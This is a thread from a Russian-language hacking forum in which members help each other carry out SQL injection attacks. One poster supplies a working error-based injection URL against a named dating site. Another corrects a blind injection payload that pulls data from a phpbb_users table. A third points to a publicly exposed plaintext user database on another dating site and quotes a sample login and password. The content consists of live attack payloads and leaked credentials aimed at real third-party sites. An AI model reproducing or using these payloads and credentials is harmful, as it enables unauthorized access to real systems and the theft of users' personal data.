Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. fletch

    fletch Member

    Joined:
    14 Jul 2009
    Messages:
    8
    Likes Received:
    25
    Reputations:
    20
    наоборот ты используе больше чем 1 ров, надо 1, добавиль лимит
     
  2. fletch

    fletch Member

    Joined:
    14 Jul 2009
    Messages:
    8
    Likes Received:
    25
    Reputations:
    20
    да возможно, сливал уже через скули. Отдельный многопоточный скрипт на перле решил мою проблему. если что могу помочь пиши асю в пм.
     
  3. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    http://www.singles-4you.de/im_show.php?rid=111-222'
    не как получается её продолжить подскажите!
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    лови

    http://www.singles-4you.de/im_show.php?rid=111222'+and+'1'='1'))+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
     
    _________________________
    3 people like this.
  5. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    осматривал сайт на sql иньекцию ничего не нашёл
    в а админке набрал логин и пароль как ' выдало сообщение об mysql ошибке
    кто что думает? такое может отображаться при дырке или реагирует на кавычку так?
    вводя другие логины с паролем ошибки нет
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    я думаю что пошел бы ка ты читать про иньекции в пост запросе и не постил всякую дребедень
     
  7. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    завязывай с милыми наездами
    я знаю что это пост запрос
    дело в том что ошибка только при кавычке а вот при запросе 3-1 странички все одинаковые т.к там особо то и нет ничего по чём можно определить различие страниц, поле логин и пароль
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну покажи как ты запрос делаешь постом 3-1
     
  9. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Немножко не по теме, извините!
    Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://whois.domaintools.com/inj3ct0r.com
    Note: This Domain Name is Suspended.
    In this status the domain name is InActive and will not function.
     
    1 person likes this.
  11. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!
     
  12. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5

    но когда пытаюсь выбрать из базы:

    (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1,1))=53,1,-1))

    вылазит ошибка


    Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1,1))=53,1,-1))

    Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1

    в чем проблема?
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    InferNo23

    подзапрос select надо взять в скобки

    SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))
     
    _________________________
    2 people like this.
  14. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42

    (id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+limit+0,1),1,1))=53,1,-1))


    теперь

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1
     
  15. DesCent

    DesCent Banned

    Joined:
    9 Jul 2010
    Messages:
    276
    Likes Received:
    51
    Reputations:
    16
    Вродь дернули на 1337db.com, но сайт тоже не отвечает.
    Следите за ихним твиттером, возможно, объявятся еще.
     
    2 people like this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    InferNo23

    так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.

    ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?
    зачем посимвольно..
     
    _________________________
    #15716 Konqi, 26 Dec 2010
    Last edited: 26 Dec 2010
    1 person likes this.
  17. Dagger

    Dagger New Member

    Joined:
    7 Oct 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    http://www.tringuladating.com//db/
    Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
     
  18. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    странно- там дамп БД юзерей в плейнтексте :D trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки :D
     
    #15718 Kusto, 27 Dec 2010
    Last edited: 27 Dec 2010
    1 person likes this.
  19. Dagger

    Dagger New Member

    Joined:
    7 Oct 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
     
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    тебе сколько лет дитё? распечатай на принтере все, раз дамп открыть не можешь

    ЗЫ. потом маркером будешь подчеркивать, зеленым логины и красным пароли..
     
    #15720 Gorev, 27 Dec 2010
    Last edited: 27 Dec 2010
    5 people like this.
Thread Status:
Not open for further replies.